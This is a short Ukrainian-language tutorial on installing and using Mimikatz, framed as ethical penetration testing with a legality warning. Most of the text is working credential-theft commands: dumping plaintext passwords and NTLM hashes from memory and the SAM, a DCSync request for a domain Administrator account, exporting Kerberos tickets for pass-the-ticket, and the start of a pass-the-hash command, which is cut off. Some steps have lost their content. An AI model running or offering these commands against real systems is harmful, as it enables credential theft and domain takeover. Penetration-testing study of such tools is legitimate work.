Mimikatz – це потужний інструмент пост-експлуатації, призначений для вилучення з пам’яті відкритих паролів, хешів, PIN-кодів і квитків Kerberos. Він широко використовується тестувальниками проникнення і фахівцями з безпеки для оцінки вразливостей систем. Цей посібник надає покроковий підхід до встановлення та використання Mimikatz для етичного тестування безпеки.
Попередження: Несанкціоноване використання Mimikatz є незаконним. Переконайтеся, що у вас є дозвіл, перш ніж використовувати його в будь-якому середовищі.
Перед встановленням Mimikatz переконайтеся, що у вас є наступне:
Mimikatz – це інструмент з відкритим вихідним кодом, доступний на GitHub. Щоб завантажити його:
Крім того, ви можете клонувати сховище за допомогою Git’а:
git clone https://github.com/gentilkiwi/mimikatz.git
Оскільки Mimikatz вимагає адміністративних привілеїв, виконайте ці кроки, щоб запустити його:
cd шлях\до\mimikatz\x64
mimikatz.exe
mimikatz #
.Перш ніж витягувати облікові дані, перевірте, чи маєте ви достатні привілеї:
privilege::debug
Якщо все пройшло успішно, ви повинні побачити Привілей '20' OK
Щоб витягти паролі з пам’яті у вигляді відкритого тексту, скористайтеся:
sekurlsa::logonpasswords
На екран буде виведено ім’я користувача, домен і паролі у відкритому вигляді, якщо вони доступні.
Хеші NTLM можуть бути використані для атак типу “перехоплення хешу”. Щоб витягти їх, виконайте:
lsadump::sam
Або, для віддалених систем:
lsadump::dcsync /domain:targetdomain.com /user:Administrator
Для отримання квитків Kerberos з системи:
sekurlsa::tickets /export
Експортує файли .kirbi
, які можуть бути використані в атаках типу pass-the-ticket.
Для автентифікації за допомогою NTLM хешу замість пароля:
sekurlsa::pth /user:Administrator /domain:example.com /ntlm: